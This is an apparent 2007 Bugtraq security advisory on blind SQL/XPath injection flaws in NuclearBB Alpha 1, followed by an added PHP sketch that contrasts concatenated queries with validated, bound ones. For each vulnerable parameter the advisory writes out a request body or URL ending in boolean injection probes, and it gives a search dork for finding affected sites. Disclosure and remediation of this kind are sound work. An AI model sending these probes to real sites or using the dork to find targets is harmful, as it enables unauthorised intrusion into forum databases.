Message-ID: <20070418191626.11560.qmail@securityfocus.com>
Date: 18 Apr 2007 19:16:26 -0000
From: john@...tinelli.com
To: bugtraq@...urityfocus.com
Subject: NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection
 Vulnerabilities

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"


=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyz@....com
email=xyz@....com
pass1=passwordxyz
pass2=passwordxyz
website=xyz@....com"+and+"1"="0
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com
icq=xyz@....com
signature=xyz@....com
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyz@....com
email=xyz@....com
pass1=xyz@....com
pass2=xyz@....com
website=xyz@....com
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com"+and+"1"="0
icq=xyz@....com
signature=xyz@....com
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyz@....com
email=xyz@....com
pass1=xyz@....com
pass2=xyz@....com
website=xyz@....com
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com
icq=xyz@....com
signature=xyz@....com"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

username=xyz@....com
email=xyz@....com+and+1=0
pass1=xyz@....com
pass2=xyz@....com
website=xyz@....com
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com
icq=xyz@....com
signature=xyz@....com
coppa_state=over
register_submit=Register


John Martinelli
john@...tinelli.com
http://john-martinelli.com

April 18th, 2007
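
Added example, not part of the original advisory and not NuclearBB code: a defensive sketch of how the two input classes listed above (string and numeric) are normally handled so that an appended boolean condition is never parsed as SQL. The table, column and function names are hypothetical, and an in-memory SQLite database via PDO stands in for the forum's real database.

```php
<?php
// Added illustration. Table, column and function names are hypothetical,
// not NuclearBB's; an in-memory SQLite database stands in for the forum's.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE forum_groups (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO forum_groups (id, name) VALUES (1, 'Administrators')");
$pdo->exec('CREATE TABLE forum_users (username TEXT PRIMARY KEY, website TEXT)');

// "Before": the request value becomes part of the SQL text, so a trailing
// condition is parsed as SQL and decides whether a row comes back.
function groupNameConcatenated(PDO $pdo, string $g): ?string
{
    $name = $pdo->query('SELECT name FROM forum_groups WHERE id = ' . $g)->fetchColumn();
    return $name === false ? null : $name;
}

// "After", numeric input: accept only a plain positive integer, then bind it.
function groupNameBound(PDO $pdo, string $g): ?string
{
    $id = filter_var($g, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('g must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT name FROM forum_groups WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

// "After", string input: bound as data, so quotes in it stay ordinary characters.
function storeWebsite(PDO $pdo, string $username, string $website): string
{
    $pdo->prepare('INSERT INTO forum_users (username, website) VALUES (?, ?)')
        ->execute([$username, $website]);
    $read = $pdo->prepare('SELECT website FROM forum_users WHERE username = ?');
    $read->execute([$username]);
    return (string) $read->fetchColumn();
}

$probe = '1 and 1=0'; // the advisory's groups.php value, URL-decoded
var_dump(groupNameConcatenated($pdo, '1'), groupNameConcatenated($pdo, $probe));
try {
    groupNameBound($pdo, $probe);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
$site = 'xyz" and "1"="0'; // the advisory's string suffix, URL-decoded
var_dump(storeWebsite($pdo, 'xyz', $site) === $site);
```

With concatenation the group lookup stops returning a row once the condition is appended, which is the response difference a blind test relies on; with validation and binding the numeric value is rejected before it reaches the database and the string value is stored byte for byte.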
